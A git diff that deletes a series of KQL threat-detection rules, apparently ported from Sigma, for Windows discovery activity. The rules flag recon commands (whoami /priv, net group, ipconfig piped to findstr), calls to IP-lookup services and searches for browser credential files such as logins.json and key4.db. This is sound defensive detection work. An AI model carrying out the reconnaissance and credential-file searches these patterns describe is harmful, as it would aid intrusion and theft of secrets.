b/Discovery/Python_Initiated_Connection.kql deleted file mode 100644 index 73ccfb59..00000000 --- a/Discovery/Python_Initiated_Connection.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/10 -// Level: medium -// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. -// Tags: attack.discovery, attack.t1046 -DeviceNetworkEvents -| where InitiatingProcessFolderPath contains "python" and (not((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1"))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe")))) \ No newline at end of file diff --git a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql b/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql deleted file mode 100644 index 2a95db99..00000000 --- a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2023/07/06 -// Level: medium -// Description: Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain. - -// Tags: attack.discovery, attack.t1057 -DeviceProcessEvents -| where ProcessCommandLine contains "ipconfig /all | find " or ProcessCommandLine contains "ipconfig /all | findstr " or ProcessCommandLine contains "ipconfig | find " or ProcessCommandLine contains "ipconfig | findstr " or ProcessCommandLine contains "ipconfig.exe /all | find " or ProcessCommandLine contains "ipconfig.exe /all | findstr " or ProcessCommandLine contains "ipconfig.exe | find " or ProcessCommandLine contains "ipconfig.exe | findstr " or ProcessCommandLine contains "net start | find" or ProcessCommandLine contains "net start | findstr" or ProcessCommandLine contains "net.exe start | find" or ProcessCommandLine contains "net.exe start | findstr" or ProcessCommandLine contains "net1 start | find" or ProcessCommandLine contains "net1 start | findstr" or ProcessCommandLine contains "net1.exe start | find" or ProcessCommandLine contains "net1.exe start | findstr" or ProcessCommandLine contains "netstat -ano | find" or ProcessCommandLine contains "netstat -ano | findstr" or ProcessCommandLine contains "netstat | find" or ProcessCommandLine contains "netstat | findstr" or ProcessCommandLine contains "netstat.exe -ano | find" or ProcessCommandLine contains "netstat.exe -ano | findstr" or ProcessCommandLine contains "netstat.exe | find" or ProcessCommandLine contains "netstat.exe | findstr" or ProcessCommandLine contains "ping | find" or ProcessCommandLine contains "ping | findstr" or ProcessCommandLine contains "ping.exe | find" or ProcessCommandLine contains "ping.exe | findstr" or ProcessCommandLine contains "systeminfo | find " or ProcessCommandLine contains "systeminfo | findstr " or ProcessCommandLine contains "systeminfo.exe | find " or ProcessCommandLine contains "systeminfo.exe | findstr " or ProcessCommandLine contains "tasklist | find " or ProcessCommandLine contains "tasklist | findstr " or ProcessCommandLine contains "tasklist.exe | find " or ProcessCommandLine contains "tasklist.exe | findstr " or ProcessCommandLine contains "whoami /all | find " or ProcessCommandLine contains "whoami /all | findstr " or ProcessCommandLine contains "whoami.exe /all | find " or ProcessCommandLine contains "whoami.exe /all | findstr " \ No newline at end of file diff --git a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql deleted file mode 100644 index 6b0bdff3..00000000 --- a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/19 -// Level: medium -// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field -// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592 -DeviceProcessEvents -| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe"))) \ No newline at end of file diff --git a/Discovery/Renamed_Whoami_Execution.kql b/Discovery/Renamed_Whoami_Execution.kql deleted file mode 100644 index a0f2b785..00000000 --- a/Discovery/Renamed_Whoami_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/12 -// Level: critical -// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql deleted file mode 100644 index 7cd541b4..00000000 --- a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/05/05 -// Level: high -// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. -// Tags: attack.privilege_escalation, attack.discovery, attack.t1033 -DeviceProcessEvents -| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql b/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql deleted file mode 100644 index 8d531a86..00000000 --- a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2023/10/20 -// Level: medium -// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. -This detection focuses on the keywords that the attacker might use as a filter. - -// Tags: attack.discovery, attack.t1518.001 -DeviceProcessEvents -| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql b/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql deleted file mode 100644 index 4dbec23f..00000000 --- a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Endgame, JHasenbusch (ported for oscd.community) -// Date: 2018/10/30 -// Level: low -// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. -// Tags: attack.discovery, attack.t1018 -DeviceProcessEvents -| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\")) \ No newline at end of file diff --git a/Discovery/Suspicious_Execution_of_Hostname.kql b/Discovery/Suspicious_Execution_of_Hostname.kql deleted file mode 100644 index be1ee918..00000000 --- a/Discovery/Suspicious_Execution_of_Hostname.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: low -// Description: Use of hostname to get information -// Tags: attack.discovery, attack.t1082 -DeviceProcessEvents -| where FolderPath endswith "\\HOSTNAME.EXE" \ No newline at end of file diff --git a/Discovery/Suspicious_Execution_of_Systeminfo.kql b/Discovery/Suspicious_Execution_of_Systeminfo.kql deleted file mode 100644 index e6aa3bdf..00000000 --- a/Discovery/Suspicious_Execution_of_Systeminfo.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: low -// Description: Detects usage of the "systeminfo" command to retrieve information -// Tags: attack.discovery, attack.t1082 -DeviceProcessEvents -| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe" \ No newline at end of file diff --git a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql b/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql deleted file mode 100644 index 45d9b7ac..00000000 --- a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE -Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) - -// Tags: attack.discovery, attack.t1087.001, attack.t1087.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts ")) \ No newline at end of file diff --git a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql b/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql deleted file mode 100644 index 34357fc4..00000000 --- a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/12/28 -// Level: high -// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 -// Tags: attack.discovery, attack.t1082 -DeviceProcessEvents -| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe") \ No newline at end of file diff --git a/Discovery/Suspicious_Network_Command.kql b/Discovery/Suspicious_Network_Command.kql deleted file mode 100644 index 1125f58f..00000000 --- a/Discovery/Suspicious_Network_Command.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' -// Date: 2021/12/07 -// Level: low -// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems -// Tags: attack.discovery, attack.t1016 -DeviceProcessEvents -| where ProcessCommandLine contains "ipconfig /all" or ProcessCommandLine contains "netsh interface show interface" or ProcessCommandLine contains "arp -a" or ProcessCommandLine contains "nbtstat -n" or ProcessCommandLine contains "net config" or ProcessCommandLine contains "route print" \ No newline at end of file diff --git a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql b/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql deleted file mode 100644 index 2324716d..00000000 --- a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/24 -// Level: medium -// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. -// Tags: attack.discovery, attack.t1016 -DeviceNetworkEvents -| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/Discovery/Suspicious_Query_of_MachineGUID.kql b/Discovery/Suspicious_Query_of_MachineGUID.kql deleted file mode 100644 index 220d7db0..00000000 --- a/Discovery/Suspicious_Query_of_MachineGUID.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: low -// Description: Use of reg to get MachineGuid information -// Tags: attack.discovery, attack.t1082 -DeviceProcessEvents -| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql b/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql deleted file mode 100644 index 6dcb8c45..00000000 --- a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/10 -// Level: medium -// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet -// Tags: attack.discovery, attack.t1087.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") \ No newline at end of file diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql deleted file mode 100644 index 62278102..00000000 --- a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: high -// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine -// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 -DeviceProcessEvents -| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/Discovery/Suspicious_Scan_Loop_Network.kql b/Discovery/Suspicious_Scan_Loop_Network.kql deleted file mode 100644 index 19d4fbec..00000000 --- a/Discovery/Suspicious_Scan_Loop_Network.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/03/12 -// Level: medium -// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system -// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018 -DeviceProcessEvents -| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping") \ No newline at end of file diff --git a/Discovery/Suspicious_Use_of_PsLogList.kql b/Discovery/Suspicious_Use_of_PsLogList.kql deleted file mode 100644 index b0aeb239..00000000 --- a/Discovery/Suspicious_Use_of_PsLogList.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/18 -// Level: medium -// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs -// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002 -DeviceProcessEvents -| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe")) \ No newline at end of file diff --git a/Discovery/Suspicious_Where_Execution.kql b/Discovery/Suspicious_Where_Execution.kql deleted file mode 100644 index ac7bc0f8..00000000 --- a/Discovery/Suspicious_Where_Execution.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/13 -// Level: low -// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. -Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about -internal network resources such as servers, tools/dashboards, or other related infrastructure. - -// Tags: attack.discovery, attack.t1217 -DeviceProcessEvents -| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data") \ No newline at end of file diff --git a/Discovery/Sysinternals_PsService_Execution.kql b/Discovery/Sysinternals_PsService_Execution.kql deleted file mode 100644 index f02b57a4..00000000 --- a/Discovery/Sysinternals_PsService_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/16 -// Level: medium -// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering -// Tags: attack.discovery, attack.persistence, attack.t1543.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe") \ No newline at end of file diff --git a/Discovery/Sysinternals_PsSuspend_Execution.kql b/Discovery/Sysinternals_PsSuspend_Execution.kql deleted file mode 100644 index fe4d7335..00000000 --- a/Discovery/Sysinternals_PsSuspend_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/23 -// Level: medium -// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes -// Tags: attack.discovery, attack.persistence, attack.t1543.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe") \ No newline at end of file diff --git a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql b/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql deleted file mode 100644 index 8bbe1a9b..00000000 --- a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/16 -// Level: high -// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). -// Tags: attack.discovery, attack.t1518.001 -DeviceProcessEvents -| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index e0972b4b..00000000 --- a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ) -// Date: 2024/02/02 -// Level: medium -// Description: An adversary might use WMI to discover information about the system, such as the volume name, size, -free space, and other disk information. This can be done using the `wmic` command-line utility and has been -observed being used by threat actors such as Volt Typhoon. - -// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082 -DeviceProcessEvents -| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql b/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql deleted file mode 100644 index 6728dc2d..00000000 --- a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/10 -// Level: low -// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. -// Tags: attack.discovery, attack.t1049 -DeviceProcessEvents -| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql b/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql deleted file mode 100644 index de756d78..00000000 --- a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: TropChaud -// Date: 2023/01/26 -// Level: medium -// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, -including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, -and GPU driver products/versions. -Some of these commands were used by Aurora Stealer in late 2022/early 2023. - -// Tags: attack.discovery, attack.t1082 -DeviceProcessEvents -| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/Discovery/Use_of_W32tm_as_Timer.kql b/Discovery/Use_of_W32tm_as_Timer.kql deleted file mode 100644 index 4e1a4aef..00000000 --- a/Discovery/Use_of_W32tm_as_Timer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/09/25 -// Level: high -// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism -// Tags: attack.discovery, attack.t1124 -DeviceProcessEvents -| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll") \ No newline at end of file diff --git a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql b/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql deleted file mode 100644 index e31beff7..00000000 --- a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: medium -// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file -// Tags: attack.discovery, attack.t1033 -DeviceProcessEvents -| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Discovery/WhoAmI_as_Parameter.kql b/Discovery/WhoAmI_as_Parameter.kql deleted file mode 100644 index f6fc51e8..00000000 --- a/Discovery/WhoAmI_as_Parameter.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/11/29 -// Level: high -// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -DeviceProcessEvents -| where ProcessCommandLine contains ".exe whoami" \ No newline at end of file diff --git a/Discovery/Whoami.EXE_Execution_Anomaly.kql b/Discovery/Whoami.EXE_Execution_Anomaly.kql deleted file mode 100644 index 67453cb8..00000000 --- a/Discovery/Whoami.EXE_Execution_Anomaly.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/12 -// Level: medium -// Description: Detects the execution of whoami.exe with suspicious parent processes. -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -DeviceProcessEvents -| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe")) \ No newline at end of file diff --git a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql b/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql deleted file mode 100644 index 35ff8ce9..00000000 --- 